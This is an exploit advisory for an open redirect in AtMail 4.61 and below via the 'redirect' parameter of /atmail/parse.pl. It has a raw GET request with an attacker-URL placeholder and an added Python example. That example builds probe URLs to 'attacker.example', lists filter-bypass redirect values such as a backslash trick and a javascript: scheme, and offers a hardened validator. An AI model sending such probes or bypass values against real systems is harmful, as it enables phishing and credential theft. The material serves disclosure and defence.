AtMail 4.61 and below Open-Redirect

March 11, 2020

Exploit Author : Lutfu Mert Ceylan
Date : 11.03.2020
Software Link : https://www.atmail.com/cloud-hosted-webmail/
Vendor Homepage : https://www.atmail.com
Version : AtMail 4.61 and below
Tested on : Mozilla Firefox 56.0 && Opera 67.0.3575.97
Category : Open Redirect
CVE ID : CVE-2020-



GET REQUEST :

GET /atmail/parse.pl?redirect=<ATTACKER_URL> HTTP/1.1
Host: targethost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cookie
Connection: close
Upgrade-Insecure-Requests: 1

Vulnerable File : /atmail/parse.pl
Vulnerable Parameter : redirect
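The request above only shows the probe; a tester still has to confirm that the 30x response's Location header actually leaves the target host, and a maintainer needs a safe replacement for trusting the redirect parameter. The Python below is an added example written for this page, not code from the advisory author or from AtMail. It assumes the advisory's placeholder host "targethost", a made-up attacker host "attacker.example", and a set of Location header values constructed here rather than captured from a real server; build_probe_url, redirect_leaves_host and safe_redirect_target are hypothetical helper names.

```python
"""Added example: classify a redirect response from /atmail/parse.pl and show a
hardened check for the redirect parameter. Not part of the original advisory."""
from urllib.parse import urlsplit, urljoin, quote

VULN_PATH = "/atmail/parse.pl"   # vulnerable file named in the advisory
PARAM = "redirect"               # vulnerable parameter named in the advisory

# Location header values constructed for this example (not captured from a
# real AtMail host) mapped to whether following them leaves "targethost".
SAMPLE_LOCATIONS = {
    "https://attacker.example/login": True,      # absolute URL, off-host
    "//attacker.example/login": True,            # scheme-relative, off-host
    "/\\attacker.example/login": True,           # browsers fold "\" to "/" -> scheme-relative
    "javascript:alert(1)": True,                 # non-http scheme
    "/atmail/index.pl": False,                   # same-origin path
    "http://targethost/atmail/index.pl": False,  # absolute URL on the same host
}


def _browserish(value):
    # Browsers strip surrounding whitespace and treat "\" as "/" in http(s)
    # URLs; mirror that so the parser sees what the browser would follow.
    return value.strip(" \t\r\n").replace("\\", "/")


def build_probe_url(target_host, attacker_url):
    """Hypothetical helper: the probe URL that the advisory's GET request expresses,
    with the attacker URL percent-encoded so it survives as one parameter value."""
    return f"http://{target_host}{VULN_PATH}?{PARAM}={quote(attacker_url, safe='')}"


def redirect_leaves_host(location, expected_host):
    """True if following this Location header value would leave expected_host,
    i.e. the response confirms an open redirect."""
    base = f"http://{expected_host}{VULN_PATH}"
    resolved = urlsplit(urljoin(base, _browserish(location)))
    if resolved.scheme not in ("http", "https"):
        return True
    return (resolved.hostname or "").lower() != expected_host.lower()


def safe_redirect_target(value, own_host, default="/atmail/"):
    """Hardened replacement for trusting the redirect parameter: accept only a
    same-origin absolute path (optionally given as an http(s) URL on own_host)
    and re-emit it as a path, so the scheme and host can never be attacker-chosen.
    Anything else falls back to default."""
    if not value:
        return default
    parts = urlsplit(_browserish(value))
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default
    if parts.netloc and (parts.hostname or "").lower() != own_host.lower():
        return default  # covers //evil, user@evil, and evil-lookalike hosts
    path = parts.path or "/"
    if not path.startswith("/"):
        return default  # refuse relative paths; only rooted same-origin paths are allowed
    return path + (f"?{parts.query}" if parts.query else "")


if __name__ == "__main__":
    print(build_probe_url("targethost", "https://attacker.example/login"))
    for loc, expected in SAMPLE_LOCATIONS.items():
        verdict = redirect_leaves_host(loc, "targethost")
        print(f"{loc!r:45} leaves host: {verdict} (expected {expected}); "
              f"hardened -> {safe_redirect_target(loc, 'targethost')!r}")
```

The backslash case matters in practice: a filter that only rejects "//" and "http" lets `/\attacker.example` through, and browsers follow it to the attacker host. Re-emitting a path instead of echoing the validated input is what keeps the hardened version from being bypassed by parser differences between the server and the browser.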

Packet Storm : 156705